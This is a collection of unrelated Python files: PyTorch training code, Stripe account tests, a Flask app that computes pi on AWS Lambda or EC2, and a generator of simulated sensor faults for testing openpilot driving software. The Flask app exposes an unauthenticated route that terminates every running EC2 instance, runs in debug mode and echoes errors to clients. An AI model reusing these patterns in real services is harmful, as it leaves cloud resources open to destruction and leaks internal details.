        self.assertEqual(len(testLines), 5)
        testStat = path.stat()
        # Read (and restore) the current umask to predict the mode bits.
        umask = os.umask(0)
        os.umask(umask)
        # Default file permissions.
        expectedStat = (0o100666 & ~umask) | stat.S_IXGRP | stat.S_IXUSR
        self.assertEqual(oct(testStat.st_mode), oct(expectedStat))
        path.unlink()
|
import time
import torch
import numpy as np
from torch import nn
from torch.utils import data as torchData
import sys
from SimpleDataset import SimpleDataset
from SimpleAutoDataset import SimpleAutoDataset
import torch.nn.functional as F
from NetworkRunner import NetworkRunner
#Network runner that Collates X values without touching them, for data that is variable length
class NetworkRunnerCollate(NetworkRunner):
    """Network runner that collates variable-length X values itself.

    The custom ``collate`` stacks each X field and moves it to the device,
    so (unlike the base class) the train/predict loops must NOT move
    ``data`` to the device again.
    """

    def __init__(self, net, batch_size=256, deviceType=None, lr=1e-2, optType='Adam', weight_decay=0, sched_factor=0.1, sched_patience=1, sched_cooldown=0, sched_thresh=1e-2, predictSoftmax=True, hyp={}):
        # NOTE(review): mutable default for hyp mirrors the base-class
        # signature; kept for interface compatibility.
        NetworkRunner.__init__(self, net, batch_size, deviceType, lr, optType, weight_decay, sched_factor, sched_patience, sched_cooldown, sched_thresh, predictSoftmax, hyp)

    def getLoaderArgs(self, shuffle=True, pinMem=False):
        """Extend the base loader args with our custom collate function."""
        d = super().getLoaderArgs(shuffle, pinMem)
        d['collate_fn'] = self.collate
        return d

    def train_epoch(self):
        """One training pass over self.curLoader; returns the mean loss.

        Same as the base train loop except data is already on the device
        (collate moved it), so only the labels are transferred here.
        """
        self.net.train()
        self.criterion = self.criterion.to(self.deviceType)
        running_loss = 0
        start_time = time.time()
        totalPairs = 0
        for batch_idx, (data, classData) in enumerate(self.curLoader):
            self.optimizer.zero_grad()
            # data already on device (see collate); only move the labels.
            classData = classData.to(self.deviceType)
            out = self.net.forward(data)
            loss = self.getLoss(out, classData)
            # Weight by batch size so the epoch mean is per-sample.
            running_loss += loss.item() * classData.shape[0]
            totalPairs += classData.shape[0]
            # backprop loss
            loss.backward()
            self.optimizer.step()
        end_time = time.time()
        running_loss /= totalPairs
        self.epoch += 1
        print('Epoch ', self.epoch, 'Train Loss: ', running_loss, 'LR', self.getLr(), 'Time: ', end_time - start_time, 's')
        return running_loss

    def predictFromLoader(self, loader):
        """Predict over *loader*; returns (stacked outputs, mean loss).

        A sentinel label of -1 in the first position marks an unlabeled
        batch; its loss is recorded as -1.
        """
        outputsLst = []
        runningLoss = 0
        totalPairs = 0
        self.criterion = self.criterion.to(self.deviceType)
        with torch.no_grad():
            self.net.eval()
            for batch_idx, (data, classData) in enumerate(loader):
                # data already on device (see collate).
                outputs = self.net(data)
                if classData[0] != -1:
                    classData = classData.to(self.deviceType)
                    loss = self.getLoss(outputs, classData).detach().item()
                else:
                    loss = -1
                outputs = self.processPredictions(outputs)
                runningLoss += loss * outputs.shape[0]
                totalPairs += outputs.shape[0]
                outputs = outputs.to('cpu').detach().numpy()
                outputsLst.append(outputs)
        runningLoss /= totalPairs
        outputsLst = np.vstack(outputsLst)
        return (outputsLst, runningLoss)

    def predictWithIndvLossFromLoader(self, loader):
        """Predict over *loader*; returns (stacked outputs, per-element losses)."""
        outputsLst = []
        lossVals = []
        totalPairs = 0
        curRed = self.criterion.reduction
        # switch criterion to not reduce, to get per element losses
        self.criterion.reduction = 'none'
        self.criterion = self.criterion.to(self.deviceType)
        with torch.no_grad():
            self.net.eval()
            for batch_idx, (data, classData) in enumerate(loader):
                # data already on device (see collate).
                outputs = self.net(data)
                if classData[0] != -1:
                    classData = classData.to(self.deviceType)
                    loss = self.getLoss(outputs, classData).detach().tolist()
                else:
                    # NOTE(review): data is the collated list of X tensors
                    # here, so data.shape would fail for multi-field inputs;
                    # left as in the original -- confirm against callers.
                    loss = [-1] * data.shape[0]  # just append -1 for each loss
                lossVals.extend(loss)
                totalPairs += data.shape[0]
                outputs = self.processPredictions(outputs)
                outputs = outputs.to('cpu').detach().numpy()
                outputsLst.append(outputs)
        outputsLst = np.vstack(outputsLst)
        # restore the caller's reduction mode
        self.criterion.reduction = curRed
        return (outputsLst, lossVals)

    def predictWithInvLoss(self, predictDataset):
        """Run per-element-loss prediction over *predictDataset*."""
        predictLoader = torchData.DataLoader(predictDataset, **self.getLoaderArgs(False, False))
        # BUG FIX: the original returned the bound method object itself
        # instead of calling it with the freshly built loader.
        return self.predictWithIndvLossFromLoader(predictLoader)

    def collate(self, tuples):
        """Stack each field of the dataset tuples; last field is the labels.

        X fields are vstacked and moved to the device; labels are stacked
        and squeezed to a 1-D tensor (left on CPU for the loops to move).
        """
        lst = []
        lst[:] = zip(*tuples)
        classes = lst[-1]
        lst = lst[:-1]
        for i in range(0, len(lst)):
            lst[i] = torch.vstack(lst[i]).to(self.deviceType)
        classes = torch.vstack(classes).squeeze(1)
        return (lst, classes)
|
<reponame>colehertz/Stripe-Tester
import stripe
from stripe.test.helper import StripeResourceTest
class AccountTest(StripeResourceTest):
    """Tests for the stripe.Account resource: each test performs an API call
    and asserts the exact request the mocked requestor received."""

    def test_retrieve_account_deprecated(self):
        # Retrieval with no id hits the deprecated singular /v1/account path.
        stripe.Account.retrieve()
        self.requestor_mock.request.assert_called_with(
            'get',
            '/v1/account',
            {},
            None
        )

    def test_retrieve_account(self):
        # Retrieval by id hits the plural /v1/accounts/<id> path.
        stripe.Account.retrieve('acct_foo')
        self.requestor_mock.request.assert_called_with(
            'get',
            '/v1/accounts/acct_foo',
            {},
            None
        )

    def test_list_accounts(self):
        stripe.Account.list()
        self.requestor_mock.request.assert_called_with(
            'get',
            '/v1/accounts',
            {}
        )

    def test_create_account(self):
        pii = {
            'type': 'individual',
            'first_name': 'Joe',
            'last_name': 'Smith',
        }
        stripe.Account.create(legal_entity=pii)
        self.requestor_mock.request.assert_called_with(
            'post',
            '/v1/accounts',
            {
                'legal_entity': pii,
            },
            None,
        )

    def test_update_account(self):
        # save() should POST only the changed nested field.
        acct = stripe.Account.construct_from({
            'id': 'acct_update',
            'legal_entity': {'first_name': 'Joe'},
        }, 'api_key')
        acct.legal_entity['first_name'] = 'Bob'
        acct.save()
        self.requestor_mock.request.assert_called_with(
            'post',
            '/v1/accounts/acct_update',
            {
                'legal_entity': {
                    'first_name': 'Bob',
                },
            },
            None,
        )

    def test_account_delete_bank_account(self):
        # Deleting a bank account goes through the external_accounts subpath.
        source = stripe.BankAccount.construct_from({
            'account': 'acc_delete_ba',
            'id': 'ba_delete_ba',
        }, 'api_key')
        source.delete()
        self.requestor_mock.request.assert_called_with(
            'delete',
            '/v1/accounts/acc_delete_ba/external_accounts/ba_delete_ba',
            {},
            None
        )

    def test_reject_account(self):
        self.mock_response({
            'id': 'acct_reject',
            'verification': {
                'disabled_reason': 'rejected.fraud'
            },
        })
        obj = stripe.Account.construct_from({
            'id': 'acct_reject'
        }, 'mykey')
        # reject() returns the same (refreshed) object instance.
        self.assertTrue(obj is obj.reject(reason='fraud'))
        self.assertEqual('rejected.fraud', obj.verification['disabled_reason'])
        self.assertEqual('acct_reject', obj.id)
        self.requestor_mock.request.assert_called_with(
            'post',
            '/v1/accounts/acct_reject/reject',
            {'reason': 'fraud'},
            None
        )

    def test_reject_account_without_reason(self):
        # Same as above but the reason parameter is optional.
        self.mock_response({
            'id': 'acct_reject',
            'verification': {
                'disabled_reason': 'rejected.fraud'
            },
        })
        obj = stripe.Account.construct_from({
            'id': 'acct_reject'
        }, 'mykey')
        self.assertTrue(obj is obj.reject())
        self.assertEqual('rejected.fraud', obj.verification['disabled_reason'])
        self.assertEqual('acct_reject', obj.id)
        self.requestor_mock.request.assert_called_with(
            'post',
            '/v1/accounts/acct_reject/reject',
            {},
            None
        )

    def test_verify_additional_owner(self):
        # Nested list updates are serialized with string indices ('0').
        acct = stripe.Account.construct_from({
            'id': 'acct_update',
            'additional_owners': [{
                'first_name': 'Alice',
                'verification': {},
            }]
        }, 'api_key')
        owner = acct.additional_owners[0]
        owner.verification.document = 'file_foo'
        acct.save()
        self.requestor_mock.request.assert_called_with(
            'post',
            '/v1/accounts/acct_update',
            {
                'additional_owners': {
                    '0': {
                        'verification': {
                            'document': 'file_foo',
                        },
                    },
                },
            },
            None,
        )
|
<filename>Application/index.py
import os
import logging
from flask import Flask, request, render_template
app = Flask(__name__)
def doRender(tname, values=None):
    """Render template *tname* with keyword context *values*.

    Falls back to rendering index.htm when templates/<tname> does not exist
    on disk (e.g. for arbitrary catch-all paths).

    NOTE: default changed from a shared mutable dict ({}) to None to avoid
    the mutable-default-argument pitfall; caller-visible behavior unchanged.
    """
    if values is None:
        values = {}
    if not os.path.isfile(os.path.join(os.getcwd(), 'templates/' + tname)):
        return render_template('index.htm')
    return render_template(tname, **values)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def mainPage(path):
    # Catch-all route: serve the template whose name matches the request path
    # (doRender falls back to index.htm when no such template file exists).
    return doRender(path)
@app.route('/terminate')
def terminate():
    """Stop and terminate every running EC2 instance in us-east-1, then
    render the home page.

    Changes from the original: removed the unused ``import sys``, replaced
    the append loop with a comprehension, and used the idiomatic truthiness
    test instead of ``ids != []``.
    """
    os.environ['AWS_SHARED_CREDENTIALS_FILE'] = './cred'
    import boto3  # imported lazily, matching the original function-local import
    ec2 = boto3.resource('ec2', region_name='us-east-1')
    instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])
    ids = [instance.id for instance in instances]
    if ids:
        ec2.instances.filter(InstanceIds=ids).stop()
        ec2.instances.filter(InstanceIds=ids).terminate()
    return doRender('index.htm', {})
@app.route('/calculate', methods=['POST'])
def calculate():
    """Estimate pi by Monte-Carlo shots, fanned out either to an AWS Lambda
    endpoint (one thread per resource) or to EC2 instances, then render
    result.htm with the merged results and an estimated cost.
    """
    #!/usr/bin/env python3
    import queue
    import threading
    import math
    import json
    import http.client
    # Modified from: http://www.ibm.com/developerworks/aix/library/au-threadingpython/
    # and fixed with try-except around urllib call
    service = request.form.get('service')
    shots = int(request.form.get('shots'))
    rate = request.form.get('rate')
    digits = int(request.form.get('digits'))-1
    runs = int(request.form.get('resources'))
    eachInstanceShots = shots/runs
    count = 0
    # NOTE(review): rebinding this name shadows the imported `queue` module;
    # harmless here because the module is not referenced again afterwards.
    queue = queue.Queue()
    if (service == 'lambda'):
        class ThreadUrl(threading.Thread):
            # Worker thread: POSTs one batch of shots to the Lambda endpoint
            # and accumulates that batch's results on the thread instance.
            def __init__(self, queue, task_id):
                threading.Thread.__init__(self)
                self.queue = queue
                self.task_id = task_id
                self.incircles = []
                self.results = []
                self.resourceId = []
                self.runningTime = []
            def run(self):
                count = self.queue.get()
                host = "jy6u38g96k.execute-api.us-east-1.amazonaws.com"
                try:
                    c = http.client.HTTPSConnection(host)
                    jsons= '{ "key1": "'+str(int(eachInstanceShots))+'", "key2": "'+rate+'", "key3": "'+str(digits)+'"}'
                    c.request("POST", "/default/test", jsons)
                    response = c.getresponse()
                    data = response.read().decode('utf-8')
                    data = json.loads(data)
                    # Response layout assumed: [incircles, results, runningTime]
                    # — TODO confirm against the Lambda implementation.
                    self.incircles.extend(data[0])
                    self.results.extend(data[1])
                    self.runningTime.append(data[2])
                    self.resourceId.append(self.task_id)
                except IOError:
                    print( 'Failed to open ' , host )
                self.queue.task_done()
        def parallel_run():
            # Launch `runs` daemon workers, feed the queue, block until all
            # tasks are done, then gather each worker's accumulators.
            threads=[]
            for i in range(0, runs):
                t = ThreadUrl(queue, i)
                threads.append(t)
                t.setDaemon(True)
                t.start()
            for x in range(0, runs):
                queue.put(count)
            queue.join()
            incircles = [t.incircles for t in threads]
            results = [t.results for t in threads]
            resourceId = [t.resourceId for t in threads]
            runningTime = [t.runningTime for t in threads]
            return incircles, results, resourceId, runningTime
        mergedIncircles = []
        mergedResults = []
        stringedResults = ''
        mergedResourceId = []
        # Truncate (not round) pi to `digits` decimal places for comparison.
        pi = int(math.pi*(10**digits))/10**digits
        piValues = ''
        matched = 0
        roundNum = 9
        sumTime = 0
        # Up to 9 rounds; stop early once the truncated estimate matches pi.
        for a in range(0,9):
            incircles, results, resourceId, runningTime = parallel_run()
            sumResults = 0
            # merging results arrays
            for i in range(0, len(results)):
                for j in range(0,len(results[i])):
                    mergedResults.append(results[i][j])
            # merging incircles arrays
            for i in range(0, len(incircles)):
                mergedIncircles.append(incircles[i])
            for i in range(0, len(resourceId)):
                mergedResourceId.append(resourceId[i])
            # Adding up results
            for i in range(0, len(mergedResults)):
                sumResults = sumResults + mergedResults[i]
            # Adding up runningTime
            for i in range(0, len(runningTime)):
                for j in range(0,len(runningTime[i])):
                    sumTime = sumTime + runningTime[i][j]
            # Final estimation
            finalResult = int(sumResults/len(mergedResults)*(10**digits))/10**digits
            if( pi == finalResult):
                matched = 1
                roundNum = a+1
                break
        # transform results to string
        for i in range(0,len(mergedResults)):
            stringedResults = stringedResults + str(mergedResults[i]) + ','
        stringedResults = stringedResults[:-1]
        for i in range(0,len(mergedResults)):
            piValues = piValues + str(pi) + ','
        # Cost model: memory-seconds at 512 MB plus a per-request charge —
        # presumably Lambda pricing constants; verify against current rates.
        comCost = sumTime*512/1024*0.0000000083
        reqCost = roundNum*runs*0.2/10**6
        finalCost = comCost + reqCost
        finalCost = f'{finalCost:.12f}'
        comCost = f'{comCost:.12f}'
        reqCost = f'{reqCost:.12f}'
        # NOTE(review): 'rate' appears twice in this dict literal; the later
        # string value silently wins over int(rate).
        return doRender( 'result.htm', {'stringedResults': piValues + '|' + stringedResults, 'incircles': mergedIncircles, 'resourceId': mergedResourceId, 'rate': int(rate), 'roundNum': roundNum, 'matched': matched, 'finalResult': finalResult, 'pi': pi, 'finalCost': finalCost, 'shots': shots, 'rate': rate, 'resources': runs, 'digits': digits+1, 'reqCost': reqCost,'comCost': comCost})
    else:
        #running ec2 instances
        os.environ['AWS_SHARED_CREDENTIALS_FILE']='./cred'
        import sys
        import boto3
        ec2 = boto3.resource('ec2', region_name='us-east-1')
        dnss = []
        instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])
        for instance in instances:
            dnss.append(instance.public_dns_name)
        # Only launch new instances when none are already running.
        if (dnss == []):
            instances = ec2.create_instances(
                ImageId='ami-0147982d8de757491',
                MinCount=1,
                MaxCount=runs,
                InstanceType='t2.micro',)
        return doRender( 'result.htm', {})
@app.errorhandler(500)
def server_error(e):
    """Log the full traceback for an unhandled exception, then return a
    minimal HTML page exposing it with HTTP status 500."""
    logging.exception('ERROR!')
    body = """
An error occurred: <pre>{}</pre>
""".format(e)
    return body, 500
if __name__ == '__main__':
    # Development entry point: bind to localhost with the Flask debugger on.
    app.run(host='127.0.0.1', port=8080, debug=True)
|
<reponame>gitguige/openpilot0.8.9
import os
import numpy as np
import random
def gen_add_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
    """Build a '//'-delimited fault snippet that adds each offset in
    *stuck_value* to the matching name in *variable*.

    The guard is *trigger_code* verbatim when non-empty; otherwise an
    'if <trig> >= t1 and <trig> <= t2:' window is generated from *trigger*
    (with two trigger names, the upper bound is checked on the second).
    """
    assert len(variable) == len(stuck_value)
    if trigger_code:
        guard = trigger_code
    else:
        upper = trigger[1] if len(trigger) > 1 else trigger[0]
        guard = 'if %s>=%s and %s<=%s:' % (trigger[0], t1, upper, t2)
    injections = ''.join('//%s+=%s' % (name, off) for name, off in zip(variable, stuck_value))
    return guard + injections + additional_code
def gen_sub_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
    """Like gen_add_code but emits '-=' injections; the generated guard
    always uses trigger[0] for both bounds of the [t1, t2] window."""
    assert len(variable) == len(stuck_value)
    guard = trigger_code if trigger_code else 'if %s>=%s and %s<=%s:' % (trigger[0], t1, trigger[0], t2)
    injections = ''.join('//%s-=%s' % (name, off) for name, off in zip(variable, stuck_value))
    return guard + injections + additional_code
def gen_none_code(trigger_code, trigger, t1, t2, additional_code):
    """Emit a '//none' fault (drop the hooked value) guarded by either
    *trigger_code* verbatim or a generated [t1, t2] window on trigger[0]."""
    guard = trigger_code if trigger_code else 'if %s>=%s and %s<=%s:' % (trigger[0], t1, trigger[0], t2)
    return guard + '//none' + additional_code
def gen_uniform_rand_code(trigger_code, trigger, t1, t2, variable, d1, d2, additional_code):
    """Emit '//var+=(delta)' injections where each delta is one draw from
    uniform(d1, d2) plus a per-variable stagger of i*3.7 (i is the variable's
    position), guarded like the other gen_* helpers."""
    guard = trigger_code if trigger_code else 'if %s>=%s and %s<=%s:' % (trigger[0], t1, trigger[0], t2)
    pieces = [guard]
    # One uniform draw per variable, in order, so RNG consumption matches
    # the original implementation exactly.
    for idx, name in enumerate(variable):
        offset = random.uniform(d1, d2) + (idx * 3.7)
        pieces.append('//%s+=(%s)' % (name, str(offset)))
    pieces.append(additional_code)
    return ''.join(pieces)
def gen_stuck_code(trigger_code, trigger, t1, t2, variable, stuck_value, additional_code):
    """Emit stuck-at injections ('//var=value') pinning each name in
    *variable* to the matching *stuck_value*, with the usual guard."""
    assert len(variable) == len(stuck_value)
    guard = trigger_code if trigger_code else 'if %s>=%s and %s<=%s:' % (trigger[0], t1, trigger[0], t2)
    injections = ''.join('//%s=%s' % (name, val) for name, val in zip(variable, stuck_value))
    return guard + injections + additional_code
### Write codes to fault library file
def write_to_file(fileName, code, param, exp_name, target_file, faultLoc):
    """Write a fault-library file (scenario_<n>.txt) and its parameter CSV,
    and append the matching run command to run_fault_inject_campaign.sh.

    NOTE(review): *fileName* is immediately overwritten below with a name
    derived from the module-level ``sceneNum`` — the argument is effectively
    ignored; kept for interface compatibility with existing callers.

    Fixes: Python 2 ``print`` statement replaced with the print() call form
    (valid under both Python 2 and 3), and the fault-count line no longer
    raises NameError when *code* is empty.
    """
    if not os.path.isdir('fault_library'):
        os.makedirs('fault_library')
    fileName = 'fault_library/scenario_' + str(sceneNum)
    out_file = fileName + '.txt'
    param_file = fileName + '_params.csv'
    with open(out_file, 'w') as outfile:
        print(out_file)
        outfile.write('title:' + exp_name + '\n')
        outfile.write('location//' + target_file + '//' + faultLoc + '\n')
        for i, line in enumerate(code):
            outfile.write('fault ' + str(i + 1) + '//' + line + '\n')
        # len(code) equals i+1 after the loop and also covers an empty *code*
        # (the old str(i+1) raised NameError when no faults were generated).
        outfile.write('Total number of fault cases: ' + str(len(code)))
    with open(param_file, 'w') as outfile:
        for i, line in enumerate(param):
            outfile.write(str(i) + ',' + line + '\n')
    with open('run_fault_inject_campaign.sh', 'a+') as runFile:
        runFile.write('python run.py ' + fileName + '\n')
### Write codes to fault library file -- for vision effects
def write_to_vision_file(fileName, code, param, exp_name, target_file, faultLoc):
    """Like write_to_file, but additionally emits per-thickness matlab/openpilot
    run commands and output directories for the vision-effect campaigns.

    NOTE(review): *fileName* carries the vision effect id; it is saved to
    ``effect`` and then overwritten with a name derived from the module-level
    ``sceneNum``.

    Fixes: Python 2 ``print`` statement replaced with the print() call form,
    and the fault-count line no longer raises NameError when *code* is empty.
    """
    if not os.path.isdir('fault_library'):
        os.makedirs('fault_library')
    effect = fileName
    fileName = 'fault_library/scenario_' + str(sceneNum)
    out_file = fileName + '.txt'
    param_file = fileName + '_params.csv'
    with open(out_file, 'w') as outfile:
        print(out_file)
        outfile.write('title:' + exp_name + '\n')
        outfile.write('location//' + target_file + '//' + faultLoc + '\n')
        for i, line in enumerate(code):
            outfile.write('fault ' + str(i + 1) + '//' + line + '\n')
        # len(code) equals i+1 after the loop and also covers an empty *code*.
        outfile.write('Total number of fault cases: ' + str(len(code)))
    with open(param_file, 'w') as outfile:
        for i, line in enumerate(param):
            outfile.write(str(i) + ',' + line + '\n')
    with open('run_fault_inject_campaign.sh', 'a+') as runFile:
        # One run (effect render + fault injection + result copy) per thickness.
        for thickness in range(1, 11):
            if not os.path.isdir('../output_files/' + str(sceneNum) + '_vision_' + effect + '/' + str(thickness)):
                os.makedirs('../output_files/' + str(sceneNum) + '_vision_' + effect + '/' + str(thickness))
            runFile.write('./run_matlab_openpilot.sh ' + effect + ' ' + str(thickness) + '\n')
            runFile.write('python run.py ' + fileName + '\n')
            runFile.write('cp -R ' + '../output_files/' + exp_name + ' ' + '../output_files/' + str(sceneNum) + '_vision_' + effect + '/' + str(thickness) + '/\n')
###########################################################
### d_rel-add-incRADAR-H1
def gen_rel_dist_add_fault_plant(sceneNum):
    """Generate add-offset faults on the radar relative distance (radar_dRel),
    covering both an in-range and an out-of-range ('invalid') delta set, then
    write the fault library via write_to_file."""
    title = str(sceneNum)+'_d_rel-add-incRADAR-H1'
    faultLibFile = 'fault_library/dRelPlantRad'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_dRel:HOOK#'
    trigger = ['frameIdx']
    # Condition-based triggers, currently unused: gen_add_code is called with
    # an empty trigger_code so a frameIdx window guard is generated instead.
    trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
    code = []
    param = []
    variable = ['radar_dRel']
    deltaRange = np.arange(15,190,10)
    invRange = np.arange(201,256,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                #code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
        # Second pass over the out-of-range delta set.
        # NOTE(review): nesting of this second loop inside the trig loop is
        # reconstructed from the surrounding pattern — confirm against the
        # original file's indentation.
        for dt in [30.0]:
            t2 = dt
            for d in invRange:
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                #code.append(gen_add_code(trigger_code, trigger, t1, t2, variable, [delta], '//if '+variable[0]+'>=255:'+'// '+variable[0]+'= 254'))
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### v_rel-add-incRADAR-H1
def gen_rel_vel_add_fault_plant(sceneNum):
    """Generate add-offset faults on the radar relative speed (v_rel),
    clamped to 60 and converted from MPH to m/s."""
    title = str(sceneNum)+'_v_rel-add-incRADAR-H1'
    faultLibFile = 'fault_library/vRelPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_add_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:','if headway_time>2.0 and RSpeed<=0:']
    code = []
    param = []
    variable = ['v_rel']
    deltaRange = np.arange(10,61,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                t1 = random.randint(2,29)
                delta = random.randint(d,d+9)
                if delta > 60:
                    delta = 60
                delta = delta*0.44704 # 1MPH = 0.44704 m/s
                code.append(gen_add_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative speed',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### d_rel-sub-incRADAR-H2
def gen_rel_dist_sub_fault_plant(sceneNum):
    """Generate subtract-offset faults on the radar relative distance,
    clamped at 0 by the injected guard code."""
    title = str(sceneNum)+'_d_rel-sub-incRADAR-H2'
    faultLibFile = 'fault_library/dRelPlantRad'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_sub_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['radar_dRel']
    deltaRange = np.arange(10,255,10)
    for trig in np.arange(0,len(trigger_code)):
        for d in deltaRange:
            for dt in [30.]:
                t2 = dt
                t1 = random.randint(2,29)
                delta = random.randint(d,d+9)
                code.append(gen_sub_code('',trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
                param.append(','.join(['relative distance',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### v_rel-sub-incRADAR-H2
def gen_rel_vel_sub_fault_plant(sceneNum):
    """Generate subtract-offset faults on the radar relative speed (v_rel),
    clamped to 60 and converted from MPH to m/s."""
    title = str(sceneNum)+'_v_rel-sub-incRADAR-H2'
    faultLibFile = 'fault_library/vRelPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_dRel:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_sub_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['v_rel']
    deltaRange = np.arange(10,61,10)
    for trig in np.arange(0,len(trigger_code)):
        for d in deltaRange:
            for dt in [30.]:
                t2 = dt
                delta = random.randint(d,d+9)
                t1 = random.randint(2,29)
                if delta > 60:
                    delta = 60
                delta = delta*0.44704 # 1MPH = 0.44704 m/s
                code.append(gen_sub_code('', trigger, t1*100., t2*100., variable, [delta], ''))
                param.append(','.join(['relative speed',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### radar-none-incRADAR-H1
def gen_radar_jamming_fault_plant_H1(sceneNum):
    """Generate radar-jamming faults (hypothesis H1): the '//none' injection
    drops the radar output while frameIdx is inside the generated window."""
    title = str(sceneNum)+'_radar-none-incRADAR-H1'
    faultLibFile = 'fault_library/radJamPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_none:HOOK#'
    trigger = ['frameIdx']
    trigger_code = ['if headway_time>2.0 or RSpeed>0:', 'if headway_time>2.0 or RSpeed<=0:', 'if headway_time<=2.0 or RSpeed<=0:'] # reverse of actual trigger
    code = []
    param = []
    variable = []
    for trig in np.arange(0,len(trigger_code)):
        for dt in [0.0]:
            t1 = random.randint(2,29)
            t2 = dt
            # NOTE(review): t2 (=0.0) is passed as the window start and t1 as
            # the end, i.e. the window is frames [0, t1*100] — confirm intended.
            code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
            param.append(','.join(['radar jamming',str(t1),str(dt),'none']))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### radar-none-incRADAR-H2
def gen_radar_jamming_fault_plant_H2(sceneNum):
    """Generate radar-jamming faults (hypothesis H2); same mechanism as H1
    but with a single trigger condition."""
    title = str(sceneNum)+'_radar-none-incRADAR-H2'
    faultLibFile = 'fault_library/radJamPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#radar_none:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_none_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 or RSpeed>0:']
    code = []
    param = []
    variable = []
    for trig in np.arange(0,len(trigger_code)):
        for dt in [0.0]:
            t1 = random.randint(2,29)
            t2 = dt
            # NOTE(review): as in H1, the window is frames [0, t1*100].
            code.append(gen_none_code('', trigger, t2*100., t1*100., ''))
            param.append(','.join(['radar jamming',str(t1),str(dt),'none']))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### curr_sp-sub-incProcPlant-H1
def gen_curr_sp_sub_fault_plant(sceneNum):
    """Generate subtract-offset faults on the reported current speed
    (speed2send), clamped at 0 by the injected guard code."""
    title = str(sceneNum)+'_curr_sp-sub-incProcPlant-H1'
    faultLibFile = 'fault_library/vCurrSpPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#speed:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_sub_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed<=0:']
    code = []
    param = []
    variable = ['speed2send']
    deltaRange = np.arange(10,61,10)
    for trig in np.arange(0,len(trigger_code)):
        for dt in [30.0]:
            t2 = dt
            for d in deltaRange:
                delta = random.randint(d,d+9)
                if delta > 60:
                    delta = 60
                delta = delta*0.44704 # 1MPH = 0.44704 m/s
                t1 = random.randint(2,29)
                code.append(gen_sub_code('', trigger, t1*100., t2*100., variable, [delta], '//if '+variable[0]+'<0:'+'// '+variable[0]+'= 0'))
                param.append(','.join(['current speed',str(t1),str(dt),str(delta)]))
    write_to_file(faultLibFile, code, param, title, fileLoc, faultLoc)
### curr_sp-add-incProcPlant-H2
def gen_curr_sp_add_fault_plant(sceneNum):
    """Generate add-offset faults on the reported current speed (speed2send),
    with the injected guard capping the result at 85.0."""
    title = str(sceneNum)+'_curr_sp-add-incProcPlant-H2'
    faultLibFile = 'fault_library/vCurrSpPlant'
    fileLoc = 'selfdrive/test/plant/plant.py'
    faultLoc = '#speed:HOOK#'
    trigger = ['frameIdx']
    # Unused here: gen_add_code is invoked with an empty trigger_code.
    trigger_code = ['if headway_time>2.0 and RSpeed<=0:','if headway_time<=2.0 and RSpeed<=0:', 'if headway_time<=2.0 and RSpeed>0:', 'if headway_time>2.0 and RSpeed>0:']
    code = []
    param = []
    variable = ['speed2send']
